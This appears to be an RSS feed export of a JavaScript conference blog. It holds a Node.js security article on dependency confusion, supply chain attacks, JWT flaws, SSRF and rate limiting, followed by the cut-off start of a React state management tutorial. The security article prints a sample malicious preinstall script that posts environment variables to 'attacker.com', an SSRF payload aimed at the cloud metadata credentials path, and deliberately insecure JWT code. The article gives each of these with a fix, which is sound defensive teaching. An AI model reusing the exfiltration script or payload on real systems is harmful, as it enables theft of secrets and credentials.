Blog - International JavaScript Conference https://javascript-conference.com/blog/ Tue, 05 Aug 2025 12:06:13 +0000 en-US hourly 1 https://wordpress.org/?v=6.7.2 https://javascript-conference.com/wp-content/uploads/2017/03/ijs-favicon-64x64.png Blog - International JavaScript Conference https://javascript-conference.com/blog/ 32 32 Preventing Dependency Risks and Authentication Flaws in Node.js https://javascript-conference.com/blog/node-js-dependency-authentication-security-part-2/ Tue, 05 Aug 2025 12:04:38 +0000 https://javascript-conference.com/?p=108252 Node.js revolutionized the web development paradigm with its event-driven, non-blocking architecture and is used for building scalable applications. But with its popularity, comes more attention from malicious actors looking to take advantage of vulnerabilities. This article examines the growing security challenge surrounding dependency risks, authentication flaws, rate limiting, and more.

The post Preventing Dependency Risks and Authentication Flaws in Node.js appeared first on International JavaScript Conference.

]]>
In Part 1 of our series, we explored some of the most common attack vectors against Node.js applications, from SQL injection, NoSQL injection, to Cross-Site Scripting (XSS) attacks. But these threats are not the only security issues that Node.js developers face today; they are only a part of it.

In this second part of our series, we will discuss lesser known, but no less dangerous threats that are specifically targeted at Node.js applications. From prototype pollution to insecure deserialization, authentication flaws to server-side request forgery – understanding these threats and their remediation strategies is crucial for secure application development in the current threat environment. Learn all about these Node.js security risks and how to prevent them.

Dependency Risks in the JavaScript Ecosystem

Problems with the JavaScript ecosystem are heavily dependent on dependencies. A typical Node.js project depends on hundreds of third-party packages, which is a huge attack surface that isn’t contained in your own code. This has been shown to be the case with recent supply chain attacks on popular npm packages. Not all security threats can be guarded against, but frameworks like Express.js, Fastify, and NestJS do provide some protection. Nevertheless, the duty is left to developers to ensure that they include security checks and measures in every stage of the application development process.

Topic 1 – Node.js Security & Dependency Management Vulnerabilities

Outdated Packages and Security Implications

It’s normal for modern Node.js applications to depend on several dozen or even hundreds of dependencies. Each outdated package is a potential security hole that’s left unpatched in your application.

The npm ecosystem is quite dynamic and vulnerabilities are often uncovered and patched within widely used packages. This means that dependencies that aren’t regularly updated can put your application at risk of being exploited while the fix is available.

Example: Say a team is using the popular lodash package v4.17.15 in their application. This package version has a prototype pollution vulnerability that was fixed in version 4.17.19. This vulnerability lets attackers manipulate prototypes of JavaScript objects and, in certain circumstances, cause application crashes or even remote code execution.

This type of vulnerability is particularly dangerous because lodash is a dependency of over 150,000 other packages, which means it’s spread throughout the ecosystem. The longer teams delay updates, the longer their applications are vulnerable.

Mitigation Strategy: Audit the packages at regular time intervals.

# Identify vulnerabilities in your dependencies

npm audit

# Fix vulnerable dependencies

npm audit fix

# For major version updates that npm audit fix can't automatically resolve

npm audit fix --force

Supply Chain Attacks

Supply chain attacks focus on the trusting relationship between developers and package maintainers. Malicious actors inject code into the supply chain to compromise a trusted package or its distribution channel.

Example Scenario: The event-stream incident of 2018 demonstrated the risks perfectly. A malicious actor was able to gain the trust of the package maintainer and was granted publishing rights to the package. They injected cryptocurrency stealing code that targeted Copay Bitcoin wallet users.

Attack Workflow:

  1. Attacker identifies a popular package with an inactive maintainer
  2. Attacker offers to help maintain the package
  3. Original maintainer grants publishing rights
  4. Attacker publishes a new version with malicious code
  5. Downstream applications automatically update to the compromised version

Mitigation Strategies: In package.json, use exact versions instead of ranges.

//In package.json, use exact versions instead of ranges

{

  "dependencies": {

    "express": "4.17.1",  // Good: exact version

    "lodash": "^4.17.20"  // Risky: accepts any 4.17.x version above 4.17.20

  }

}

//Use package-lock.json or npm shrinkwrap to lock all dependencies 

//Example using npm-package-integrity:




const integrity = require('npm-package-integrity');

integrity.check('./package.json').then(results => {

  if (results.compromised.length > 0) {

    console.error('Compromised packages detected:', results.compromised);

    process.exit(1);

  }

});

Dependency Confusion Attacks

Dependency confusion attacks occur when package managers download dependencies from both public and private registries and can result in the use of public packages when there are private packages with higher versions available. This can happen when there’s a private package name in the public registry with a higher version and the package manager could pull the public version.

Example Attack Scenario: Your company uses a private package called @company/api-client 1.2.3. The attacker identifies this package name in your public repository’s package.json and releases a malicious package with the same name but version 2.0.0 to the public npm registry. When you install the malicious package, npm will find the higher version in the public registry and install the package from the attacker.

Example Workflow:

  1. When you install a malicious package, the attacker might run a script when the package is installed.
// Malicious package preinstall script

// This runs automatically when the package is installed

const fs = require('fs');

const https = require('https');




// Stealing environment variables

const data = JSON.stringify({

  env: process.env,

  path: process.cwd()

});




// Sending data to attacker's server

const req = https.request({

  hostname: 'attacker.com',

  port: 443,

  path: '/collect',

  method: 'POST',

  headers: {'Content-Type': 'application/json'}

}, res => {});




req.write(data);

req.end();

Mitigation Strategies:

Use Scoped Packages: Scoped packages in npm help ensure that your packages are uniquely identified. For example, use @yourcompany/package-name instead of just package-name.

{

  "name": "my-project",

  "version": "1.0.0",

  "dependencies": {

    "@yourcompany/internal-package": "1.2.3"

  },

  "publishConfig": {

    "registry": "https://registry.yourcompany.com"

  }

}

In this example, the following measures are taken:

  • The package is scoped with @yourcompany to ensure uniqueness.
  • The publishConfig ensures that the package manager uses your private registry.

Topic 2 – Authentication Flaws Threatening Node.js Security

JSON Web Token (JWT) Vulnerabilities – JWTs are among the most common means of authentication in Node.js apps, particularly for RESTful APIs. However, this can be done incorrectly.

Common JWT Vulnerabilities:

  1. Weak Signing Algorithms: None or insecure algorithms like HMAC with small keys.
  2. Insecure Token Storage: Saving tokens in localStorage instead of using HttpOnly cookies.
  3. Missing Token Validation: Invalidating tokens that have not been signed, expired or targeted.
  4. Hardcoded Secrets: Using hardcoded secrets in the source code.

Example of Vulnerable JWT Implementation:

const jwt = require('jsonwebtoken');

// Hardcoded secret in source code

const secret = 'mysecretkey';

app.post('/login', (req, res) => {  

  // Create token with no expiration or audience validation

  const token = jwt.sign({ userId: user.id }, secret);

  res.json({ token });

});

app.get('/protected', (req, res) => {

  try {

    // No token validation or structure checks

    const token = req.headers.authorization.split(' ')[1];

    const decoded = jwt.verify(token, secret);

    
    // No additional checks on decoded token content

    res.json({ data: 'Protected resource' });

  } catch (error) {

    res.status(401).json({ error: 'Unauthorized' });

  }

});

In the above example code, there are multiple issues:

Hard Coded Secret

  • Problem: The secret key is stored in the source code.
  • Risk: If the source code is revealed, the secret key can be easily guessed.

No Token Expiration

  • Problem: The JWT is created without an expiration date.
  • Risk: Once issued, tokens can be used for an indefinite period of time if they are compromised.

Plain Text Token Transmission

  • Problem: The token is sent in plaintext in the response.
  • Risk: If tokens aren’t sent over HTTPS, they can be easily intercepted.

No Token Validation or Structure Checks

  • Issue: The token is extracted and verified without checking its claims.
  • Risk: Malformed or tampered tokens can bypass security checks.

Improved code with Secure JWT Implementation:

const jwt = require('jsonwebtoken');

const fs = require('fs');

require('dotenv').config();




// Load JWT secret from environment variable

const secret = process.env.JWT_SECRET;

if (!secret || secret.length < 32) {

  throw new Error('JWT_SECRET environment variable must be set with at least 32 characters');

}




app.post('/login', async (req, res) => {

  // Create token with proper claims

  const token = jwt.sign(

    { 

      userId: user.id,

      role: user.role

    },

    secret,

    { 

      expiresIn: '1h',

      issuer: 'my-app',

      audience: 'my-api',

      notBefore: 0

    }

  ); 

  // Send token in HttpOnly cookie

  res.cookie('token', token, {

    httpOnly: true,

    secure: process.env.NODE_ENV === 'production',

    sameSite: 'strict',

    maxAge: 3600000 // 1 hour

  });

  

  res.json({ message: 'Authentication successful' });

});




app.get('/protected', (req, res) => {

  try {

    // Extract token from cookie (not from headers)

    const token = req.cookies.token;

    

    if (!token) {

      return res.status(401).json({ error: 'Authentication required' });

    }  

    // Verify token with all necessary options

    const decoded = jwt.verify(token, secret, {

      issuer: 'my-app',

      audience: 'my-api'

    })    

    // Additional validation

    if (decoded.role !== 'admin') {

      return res.status(403).json({ error: 'Insufficient permissions' });

    }  

    res.json({ data: 'Protected resource' });

  } catch (error) {

    if (error.name === 'TokenExpiredError') {

      return res.status(401).json({ error: 'Token expired' });

    }

    res.status(401).json({ error: 'Invalid token' });

  }

});

This above code snippet demonstrates a strong focus on security through several measures:

  • Environment Variables: Some of the sensitive data like the JWT secret are stored in environment variables. This helps in avoiding the data being hardcoded and reduces the risk of exposure.
  • Secure Cookies: The JWT token is saved in an HttpOnly cookie with secure and SameSite=strict flags, making it immune to XSS and CSRF attacks.
  • Role Based Access Control: The implementation checks the user’s role before allowing access to the protected resources in the application. Only authorized users can access sensitive endpoints.

Topic 3 – Preventing SSRF Attacks in Node.js Security

Side Request Forgery (SSRF) is a type of vulnerability where attackers can make servers make requests to unintended targets. This is problematic in the Node.js environment since HTTP requests are easy to make, especially with libraries such as axios, request, got, node-fetch, and the native http/https modules.

SSRF attacks exploit server-side code that makes requests to other services, allowing attackers to:

  1. Access internal services behind firewalls that aren’t normally accessible from the internet.
  2. Scan internal networks and discover services on private networks.
  3. Interact with metadata services in cloud environments (e.g. AWS EC2 metadata service).
  4. Exploit trust relationships between the server and other internal services.

Common Attack Vectors

  1. URL Parameters in API Proxies: Many Node.js applications function as API gateways or proxies, forwarding requests to backend services.

Vulnerable Example:

const express = require('express');

const axios = require('axios');

const app = express();




app.get('/proxy', async (req, res) => {

  const url = req.query.url;

  try {

    // User can control the URL completely

    const response = await axios.get(url);

    res.json(response.data);

  } catch (error) {

    res.status(500).json({ error: error.message });

  }

});

In this example, an attacker could provide a URL pointing to an internal service, such as: GET /proxy?url=http://internal-admin-panel.local/users

Now let’s see a secure way of the implementation:

const express = require('express');

const axios = require('axios');

const URL = require('url').URL;

const app = express();




// Define allowed domains

const ALLOWED_HOSTS = ['api.trusted.com', 'public-service.org'];




app.get('/proxy', async (req, res) => {

  const url = req.query.url;

  

  try {

    // Validate URL format

    const parsedUrl = new URL(url);

    if (!ALLOWED_HOSTS.includes(parsedUrl.hostname)) {

      return res.status(403).json({ error: 'Domain not allowed' });

    } 

    // Proceed with request to allowed domain

    const response = await axios.get(url);

    res.json(response.data);

  } catch (error) {

    res.status(400).json({ error: 'Invalid URL or request failed' });

  }

});

In the example above, a few best practices were followed:

Domain Whitelisting:

  • Defines a list of allowed domains (ALLOWED_HOSTS).
  • Then we check if the hostname of the user-supplied URL is in this list before proceeding with the request.
  • Ensures that only requests to trusted domains are allowed, reducing the risk of SSRF attacks.
  • Prevents the application from making requests to unauthorized or potentially malicious domains.
  1. File Upload Services with Remote URL Support

Vulnerable Code:

app.post('/fetch-image', async (req, res) => {

  const imageUrl = req.body.imageUrl;

  

  try {

    // Downloads from any URL without validation

    const response = await axios.get(imageUrl, { responseType: 'arraybuffer' });

    const imageBuffer = Buffer.from(response.data);

    

    // Save to local storage

    fs.writeFileSync(`./uploads/${Date.now()}.jpg`, imageBuffer);

    res.json({ success: true });

  } catch (error) {

    res.status(500).json({ error: error.message });

  }

});

An attacker can supply a malicious URL that can force the server to make requests to internal services or endpoints that should not be accessed by the public. This can result in the exposure of sensitive information or internal networks.

Example Attack:

Example Attack:

POST /fetch-image

Body: { "imageUrl": "http://169.254.zzz.xxx/latest/meta-data/iam/security-credentials/" }

Secure Implementation/Fix

  • Validate URL Format: Use the URL constructor to make sure the URL is well formed. Disallow anything but http and https to avoid the possibility of harmful protocols being used.
  • DNS Resolution and IP Blocking: Look up the hostname to IP using dns lookup. Avoid using private networks (10.x.x.x, 172.16.x.x, 192.168.x.x, 127.x.x.x, 169.254.x.x) to avoid disclosing information that can be used to reach resources on the internal network and to prevent SSRF attacks.
  • Preventing Redirects: Set the maxRedirects property of the axios request to 0 to avoid redirect-based bypasses that can allow access to prohibited URLs.
const dns = require('dns').promises;




app.post('/fetch-image', async (req, res) => {

  const imageUrl = req.body.imageUrl;

  

  try {

    // 1. Validate URL format

    const parsedUrl = new URL(imageUrl);

    

    // 2. Only allow http/https protocols

    if (!['http:', 'https:'].includes(parsedUrl.protocol)) {

      return res.status(403).json({ error: 'Protocol not allowed' });

    }

    

    // 3. Resolve hostname to IP

    const { address } = await dns.lookup(parsedUrl.hostname);

    

    // 4. Block private IP ranges

    if (/^(10\.|172\.(1[6-9]|2[0-9]|3[0-1])\.|192\.168\.|127\.|169\.254\.)/.test(address)) {

      return res.status(403).json({ error: 'Cannot access internal resources' });

    }

    

    // 5. Now safe to proceed

    const response = await axios.get(imageUrl, { 

      responseType: 'arraybuffer',

      maxRedirects: 0 // Prevent redirect-based bypasses

    });

    

    const imageBuffer = Buffer.from(response.data);

    fs.writeFileSync(`./uploads/${Date.now()}.jpg`, imageBuffer);

    res.json({ success: true });

  } catch (error) {

    res.status(400).json({ error: 'Invalid URL or request failed' });

  }

});

Topic 4 – Rate Limiting and DoS Protection

Attackers are known to launch traffic-based attacks on Node.js applications to knock or take over systems:

  1. Distributed Denial of Service (DDoS): Your server is flooded by many requests from so many attackers that legitimate users are unable to access the service.
  2. Brute Force Attempts: Attackers use automated tools to try and login to your application with random combinations of credentials in an attempt to guess the valid authentication credentials.
  3. Scraping and Harvesting: Your application is accessed by bots to make many requests to gather content from your application, affecting performance and data leakage.
  4. API Abuse: API requests to use up resources or to take advantage of the free tiers usually reserved for your application’s APIs.

Note: At the infrastructure level, solutions including AWS WAF, Cloudflare, or Nginx can provide better protection without imposing too much load on your application code. These services provide more sophisticated features like distributed rate limiting, traffic monitoring, and auto-scaling during attacks. But this article focuses only on application-level security policies.

Traffic Management Best Practices

Proper traffic management begins with rate limiting both in the application and infrastructure. This can be done in Node.js using the express-rate-limit middleware package.

const rateLimit = require('express-rate-limit');


const apiLimiter = rateLimit({

  windowMs: 15 * 60 * 1000,

  max: 100, // limit each IP to 100 requests per windowMs

  message: 'Too many requests, please try again later.'

});

app.use('/api/', apiLimiter); // Apply to all API endpoints

app.use('/api/', apiLimiter);

To have a finer level of control, set different rate limits on different endpoints depending on the level of sensitivity and resource requirement of the endpoints.

For instance, authentication endpoints are usually more secure than general content endpoints. Moreover, implement progressive delays for failed attempts and account lockout policies for persistent failures. The library node-rate-limiter-flexible helps enhance features like Redis-based distributed rate limiting for apps deployed on multiple servers.

Mitigating DoS Vulnerabilities

Set request size limits to prevent payload attacks:

app.use(express.json({ limit: '10kb' }));

app.use(express.urlencoded({ extended: true, limit: '10kb' }));

Use helmet for additional HTTP security headers:

const helmet = require('helmet');

app.use(helmet());

Infrastructure-Level Protection

Security is better to approach from the infrastructure-level and use the application-level security as the secondary layer. Options include:

  • Reverse Proxies: Nginx or HAProxy can serve as a barrier, perform rate limiting, and work as a middle layer between your clients and the application.
  • CDNs: Cloudflare or Fastly offers integrated DDoS protection and rate limiting.
  • Cloud Provider Solutions: AWS WAF, Azure Front Door or Google Cloud Armor can be used to monitor and filter traffic.
  • Load Balancers: It can be used to distribute traffic across multiple instances, increasing the load and filter suspicious requests.

Conclusion: Strengthening Node.js Security Layers

Node.js security is an evolving challenge; keeping up with remediation strategies is essential to protect your applications from modern attack vectors. As discussed in detail in this article, attackers are always looking for ways to exploit traffic vulnerabilities. Therefore, a layered approach is necessary. Key points to keep in mind include:

  • In-depth defense is essential: Combine application-level protections such as middleware and request limits are with infrastructure level defenses like reverse proxies, CDN, and WAF to create several layers of protection against traffic-based attacks on Node.js apps.
  • Understand attack patterns: This is only possible if you understand strategies like DDoS attacks, brute force attempts, API abuse, and resource exhaustion.
  • Balance security with usability: Set rate limits properly to prevent malicious traffic without affecting the service quality of legitimate users. Endpoints need different thresholds as per their risk and frequency of use.
  • Implement graduated responses: Step-by-step measures should be taken beginning with slight delays, temporary blockage, and permanent IP blockage for severe attackers as per the frequency and severity of suspicious activities.
  • Continuously monitor and adjust: Security is not set and forget—traffic patterns should be analyzed regularly, rate limits should be checked and altered, and protection mechanisms should be updated to address new threats and application requirements.
  • Leverage existing tools: Some recommended libraries include express-rate-limit, Cloudflare, or AWS WAF instead of developing your own and making potential critical errors during development.
  • Consider distributed applications: For applications deployed on several servers, the distributed rate limiting policy should be implemented using Redis or a similar technology to ensure that the whole infrastructure is uniformly protected.
  • Test your defenses: Regularly conduct penetration testing to verify the effectiveness of your rate limiting and DoS protection measures under realistic attack scenarios.

 

🔍 Frequently Asked Questions (FAQ)

1. What are the main dependency risks in Node.js applications?

Node.js applications often depend on hundreds of third-party packages, increasing their exposure to vulnerabilities. Outdated packages, supply chain compromises, and dependency confusion are among the most critical risks developers must mitigate.

2. How can outdated Node.js packages introduce security vulnerabilities?

Outdated packages may contain known vulnerabilities that attackers can exploit. For example, lodash v4.17.15 has a prototype pollution issue that was fixed in v4.17.19, affecting thousands of dependent packages.

3. What is a supply chain attack in the Node.js ecosystem?

A supply chain attack occurs when malicious code is injected into a trusted dependency, often through social engineering or takeover of an inactive package. This code propagates downstream, compromising applications that rely on the affected package.

4. How can developers prevent dependency confusion in npm?

To prevent dependency confusion, developers should use scoped packages (e.g., @company/package) and configure the publishConfig.registry field to enforce use of internal registries.

5. What are common JWT vulnerabilities in Node.js?

Frequent JWT vulnerabilities include hardcoded secrets, weak signing algorithms, lack of token validation, and insecure token storage. These flaws can lead to unauthorized access and token abuse.

6. How should JWTs be securely implemented in Node.js?

Secure JWT implementations use environment variables for secrets, set expiration and validation claims, and transmit tokens via HttpOnly cookies with strict flags to mitigate XSS and CSRF attacks.

7. What is Server-Side Request Forgery (SSRF) and how can it be exploited in Node.js?

SSRF exploits occur when an attacker manipulates the server into making unauthorized requests, potentially exposing internal services or metadata endpoints. This is often done via user-controlled URLs in APIs or file uploads.

8. How can developers mitigate SSRF in Node.js applications?

Mitigation techniques include domain whitelisting, validating URL protocols, resolving DNS to block private IPs, and disabling redirects in HTTP clients like Axios.

9. What are best practices for rate limiting in Node.js?

Use libraries like express-rate-limit to set per-IP request caps, apply stricter controls on authentication routes, and consider distributed rate limiting via Redis for multi-instance applications.

10.How can infrastructure-level protection enhance Node.js app security?

Infrastructural tools like AWS WAF, Cloudflare, and Nginx offer advanced rate limiting, request filtering, and DDoS protection beyond what app-level middleware can provide.

The post Preventing Dependency Risks and Authentication Flaws in Node.js appeared first on International JavaScript Conference.

]]>
What’s the Best Way to Manage State in React? https://javascript-conference.com/blog/react-state-management-context-zustand-jotai/ Wed, 30 Jul 2025 11:51:42 +0000 https://javascript-conference.com/?p=108242 No topic is as controversial in the React world as state management. Unlike many other topics, there aren’t just two camps. Solutions range from categorically rejecting central state management to implementing state management solutions with React’s built-in tools or lightweight libraries, right through to using heavyweight solutions that determine the entire application’s architecture. Let’s examine several state management approaches and use cases, focusing on lightweight solutions with a low overhead and a limited impact on the overall application.

The post What’s the Best Way to Manage State in React? appeared first on International JavaScript Conference.

]]>
Let’s start at the very beginning: Why is central state management necessary? This question is not exclusive to React; it arises from modern single-page frameworks’ component-based approaches. In these frameworks, components form the central building blocks of applications. Components can have their own state, which contains either the data to be presented in the browser or the status of UI elements. A frontend application usually contains a large number of small, loosely coupled, and reusable components that form a tree structure. The closer the components are to the root of the tree, the more they are integrated into the application’s structure and business logic.

The leaf components of the tree are usually UI components that take care of the display. The components need data to display. This data usually comes from a backend interface and is loaded by the frontend components. In theory, each component can retrieve its own data, but this results in a large number of requests to the backend. Instead, requests are usually bundled at a central point. The component forming the lowest common denominator, i.e., the parent component for all that need information from this backend interface, is typically the appropriate location for server communication and data management.

And this is precisely the problem leading to central state management. Data from the backend has to be transferred to the components handling the display. This data flow is handled by props, the dynamic attributes of the components. This channel also takes care of write communication: creating, modifying, and deleting data. This isn’t an issue if there are only a few steps between the data source and display, but the longer the path, the greater the coupling of the component tree. Some of the components between the source and the target have nothing to do with the data and simply pass it on. However, this significantly limits reusability. The concept of central state management solves this by eliminating the communication channel using props and giving child components direct access to the information. React’s Context API makes this shortcut possible.

Central state management has many use cases. It’s often used in applications that deal with data record management. This includes applications that manage articles and addresses, fleet management, smart home controls, and learning management applications. The one thing all use cases have in common is that the topic runs through the entire application and different components need to access the data. Central state management minimizes the number of requests, acts as a single source of truth, and handles data synchronization.

Can You Manage Central State in React Without Extra Libraries?

For a long time, the Redux library was the central state management solution, and it’s still popular today. With around 8 million weekly package downloads, the React bindings for Redux are ahead of popular libraries like TanStack Query with 5 million downloads or React Hook Form with 6.5 million downloads. Overall, Redux downloads have been stagnating for some time. This is partly due to Redux’s somewhat undeserved bad reputation. The library has long been accused of causing unnecessary overhead, which prompted Dan Abramov, one of its developers, to write his famous article entitled “You might not need Redux.” Essentially, he says that Redux does involve a certain amount of overhead, but it quickly pays off in large applications. Extensions like the Redux Toolkit also further reduce the extra effort.

The lightest Redux alternative consists of a custom implementation based on React’s Context API and State Hook. The key advantage is that you don’t need any additional libraries. For example, let’s imagine a shopping cart in a web shop. The cart is one of the shop’s central elements and you need to be able to access it from several different places. In the shop, you should be able to add products to the cart using a list. The list shows the number of items currently in the shopping cart. An overview component shows how many products are in the cart and the total value. Both components – the list and the overview – should be independent of each other but always show the latest information.

Without React’s Context API, the only solution is to store shopping cart data in the state of a component that’s a parent to both components. Then, this passes its state to the components using props. This creates a very right coupling between these components. A better solution is based on the Context API. For this, you need the context, which you create with the createContext function. The provider component of the context binds it to the component tree, supplies it with a concrete value, and allows child components to access it. Since React 19, the context object can also be used directly as a provider. This eliminates needing to take a detour with the context’s provider component. With useContext (or, since React 19, the use function), you can access the context. Listing 1 shows the implementation of CartContext.

Listing 1: Implementing CartContext

import {
  createContext,
  Dispatch,
  FC,
  ReactNode,
  SetStateAction,
  use,
  useState,
} from 'react';
import { Cart } from './types/Cart';

type CartContextType = [Cart, Dispatch<SetStateAction<Cart>>];
const CartContext = createContext<CartContextType | null>(null);

type CartProviderProps = {
  children: ReactNode;
};
export const CartProvider: FC<CartProviderProps> = ({ children }) => {
  const cart = useState<Cart>({ items: [] });

  return <CartContext value={cart}>{children}</CartContext>;
};

export function useCart() {
  const context = use(CartContext);
  if (!context) {
    throw new Error('useCart must be used within a CartProvider');
  }
  return context;
}

The idea behind React’s Context API is that you can store any structure and access it from all child components. The structure can be a simple value like a number or a string, but objects, arrays, and functions are also allowed. In our example, the cart’s state structure is in the context. As usual in React, this is a tuple consisting of the state object, which you can use to read the state, and a function that can change the state. The CartContext can either contain the state structure or the value null. When you call the createContext function, you pass null as the default value. This lets you check if the context provider has been correctly integrated.

The CartProvider component defines the cart state and passes it as a value to the context. It accepts children in the form of a ReactNode object. This lets you integrate the CartProvider component into your component tree and gives all child components access to the context.

The last implementation component is a hook function called useCart. This controls access to the context. The use function provides the context value. If the value is null, it indicates that you should use useCart outside of CartProvider. In this case, the function throws an exception instead of returning the state value.

What does the application code look like when you want to access the state? We’ll use the ListItem component as an example. It accesses the context in both read and write mode. Listing 2 shows the simplified source code for the component.

Listing 2: Accessing the context

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useCart } from './CartContext';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);

  const [cart, setCart] = useCart();

  function addToCart() {
    const quantity = Number(inputRef.current?.value);
    if (quantity) {
      setCart((prev) => ({
        items: [
          ...prev.items.filter((item) => item.id !== product.id),
          {
            ...product,
            quantity,
          },
        ],
      }));
    }
  }

  return (
    <li>
      {product.name}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cart.items.find((item) => item.id === product.id)?.quantity
        }
      />
      <button onClick={addToCart}>add</button>
    </li>
  );
};

export default ListItem;

The ListItem component represents each entry in the product list and displays the product name and an input field where you can specify the number of products you want to add to the shopping cart. When you click the button, the component’s addToCart function updates the cart context. This is possible by using the useCart function to access the state of the shopping cart and entering the current product quantity in the input field. Use the setCart function to update the context.

One disadvantage of this implementation is that the ListItem component has to know the CartContext precisely and performs the state update in the callback function of the setCart function. You can solve this by outsourcing this block as a function. Here, the ListItem component can access the functionality as well as every component in the application.

How Do You Synchronize React State with Server Communication?

This solution only works locally in the browser. If you close the window or if a problem occurs, the current shopping cart disappears. You can solve this by applying the actions locally to the state and saving the operations on the server. But this makes implementation a little more complex. When loading the component structure, you must load the currently valid shopping cart from the server and save it to the state. Then, apply each change both on the server side and in the local state. Although this results in some overhead, the advantage is that the current state can be restored at any time, regardless of the browser instance. If you implement the addToCart functionality as a separate hook function, the components remain unaffected by this adjustment.

Listing 3: Implementing the addToCart Functionality

import {
  createContext,
  Dispatch,
  FC,
  ReactNode,
  SetStateAction,
  use,
  useEffect,
  useRef,
  useState,
} from 'react';
import { Cart } from './types/Cart';
import { Product } from './types/Product';

type CartContextType = [Cart, Dispatch<SetStateAction<Cart>>];
const CartContext = createContext<CartContextType | null>(null);

type CartProviderProps = {
  children: ReactNode;
};
export const CartProvider: FC<CartProviderProps> = ({ children }) => {
  const cart = useState<Cart>({ items: [] });

  useEffect(() => {
    fetch('http://localhost:3001/cart')
      .then((response) => response.json())
      .then((data) => cart[1](data));
  }, []);

  return <CartContext value={cart}>{children}</CartContext>;
};

export function useCart() {
  const context = use(CartContext);
  if (!context) {
    throw new Error('useCart must be used within a CartProvider');
  }
  return context;
}

export function useAddToCart(
  product: Product
): [React.RefObject<HTMLInputElement | null>, () => void] {
  const [cart, setCart] = useCart();
  const inputRef = useRef<HTMLInputElement>(null);

  function addToCart() {
    const quantity = Number(inputRef.current?.value);

    if (quantity) {
      const updatedItems = [
        ...cart.items.filter((item) => item.id !== product.id),
        { ...product, quantity },
      ];

      fetch('http://localhost:3001/cart', {
        method: 'PUT',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ id: 1, items: updatedItems }),
      })
        .then((response) => response.json())
        .then((data) => setCart(data));
    }
  }

  return [inputRef, addToCart] as const;
}

The CartProvider component loads the current shopping cart from the server. How users access the shopping cart depends upon the specific interface implementation. The code in the example assumes that the server makes the shopping cart available for the current user via /cart. One potential solution is to differentiate between users using cookies. The second adjustment consists of the useAddToCart function. It receives a product and generates the addToCart function and the ref for the input field. In the addToCart function, the shopping cart is updated locally, sent to the server, and then the local state is set by calling the setCart function. During implementation, we assume the shopping cart is updated via a PUT request to /cart and that this interface returns the updated shopping cart.

Implementation using a combination of context and state is suitable for manageable use cases. It’s lightweight and flexible, but large applications run the risk of the central state becoming chaotic. One possible fix is no longer exposing the function for modifying the state externally, but using the useReducer hook instead.

How Can You Manage React State Using Actions?

React offers another hook for component state management with the useReducer hook. This differs from the more commonly used useState hook and does not provide a function for changing the state. Instead, it returns a tuple of readable state and a dispatch function. When you call the useReducer function, you pass a reducer function whose task is to generate a new state from the previous state and an action object.

The action object describes the change, like adding products to the shopping cart. Actions are usually simple JavaScript objects with the properties type and payload. The type property specifies the type of action, and the payload provides additional information.

The reducer hook is intended for local state management, but you can easily integrate asynchronous server communication. However, it’s recommended that you separate synchronous local operations from asynchronous server-based operations. The reducer should be a pure function and free of side effects. This means that the same inputs always result in the same outputs and the current state is only changed based on the action provided. If you stick to this rule, your code will be clearer and better structured, and error handling is easier. You’ll also be more flexible when it comes to future software extensions. Listing 4 shows an implementation of state management with the useReducer hook.

Listing 4: Using the useReducer-Hooks

import {
  createContext,
  Dispatch,
  FC,
  ReactNode,
  useContext,
  useEffect,
  useReducer,
} from 'react';
import { Cart, CartItem } from './types/Cart';

const SET_CART = 'setCart';
const ADD_TO_CART = 'addToCartAsync';
const FETCH_CART = 'fetchCart';

type FetchCartAction = {
  type: typeof FETCH_CART;
};

type SetCartAction = {
  type: typeof SET_CART;
  payload: Cart;
};

type AddToCartAsyncAction = {
  type: typeof ADD_TO_CART;
  payload: CartItem;
};

type CartAction = FetchCartAction | SetCartAction | AddToCartAsyncAction;

type CartContextType = [Cart, Dispatch<CartAction>];
const CartContext = createContext<CartContextType | null>(null);

type CartProviderProps = {
  children: ReactNode;
};

function cartReducer(state: Cart, action: CartAction): Cart {
  switch (action.type) {
    case SET_CART:
      return action.payload;

    default:
      throw new Error(`Unhandled action type: ${action.type}`);
  }
}

function cartMiddleware(dispatch: Dispatch<CartAction>, cart: Cart) {
  return async function (action: CartAction) {
    switch (action.type) {
      case FETCH_CART: {
        const response = await fetch('http://localhost:3001/cart');
        const data = await response.json();
        dispatch({ type: SET_CART, payload: data });
        break;
      }
      case ADD_TO_CART: {
        const response = await fetch('http://localhost:3001/cart', {
          method: 'PUT',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({
            items: [...cart.items, action.payload],
          }),
        });

        const updatedCart = await response.json();
        dispatch({ type: SET_CART, payload: updatedCart });
        break;
      }
      default:
        dispatch(action);
    }
  };
}

export const CartProvider: FC<CartProviderProps> = ({ children }) => {
  const [cart, dispatch] = useReducer(cartReducer, { items: [] });
  const enhancedDispatch = cartMiddleware(dispatch, cart);

  useEffect(() => {
    enhancedDispatch({ type: FETCH_CART });
  }, []);

  return (
    <CartContext.Provider value={[cart, enhancedDispatch]}>
      {children}
    </CartContext.Provider>
  );
};

export function useCart() {
  const context = useContext(CartContext);
  if (!context) {
    throw new Error('useCart must be used within a CartProvider');
  }
  return context;
}

export function useAddToCart() {
  const [, dispatch] = useCart();

  const addToCart = (item: CartItem) => {
    dispatch({ type: ADD_TO_CART, payload: item });
  };

  return addToCart;
}

The CartProvider component is the starting point for implementation. It holds the context and creates the state using the useReducer hook. It also uses the FETCH_CART action to ensure that the existing shopping cart is loaded from the server. The code has two parts: the reducer itself and a middleware. The reducer takes the form of the cartReducer function and is responsible for the local state. It consists of a switch statement and, in this simple example, supports the SET_CART action, which sets the shopping cart. What’s more interesting though is the cartMiddleware function. This is responsible for the asynchronous actions FETCH_CART and ADD_TO_CART. Unlike the reducer, the middleware cannot access the state directly, but must pass changes to the reducer via actions. To do this, it uses the dispatch function from the useReducer hook. The middleware can also have side effects such as asynchronous server communication. For example, the FETCH_CART action triggers a GET request to the server to retrieve the data from the current shopping cart. Once the data is available, it’s written to the local state using the SET_CART action.

If the middleware isn’t responsible for a received action, it passes it directly to the reducer so that you don’t need to distinguish between the two in the application and can simply use the middleware.

The useCart and useAddToCart functions are the interfaces between the application components and the reducer. Listing 5 shows how to use the reducer implementation in your components.

Listing 5: Integrating the reducer implementation

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useCart, useAddToCart } from './CartContext';

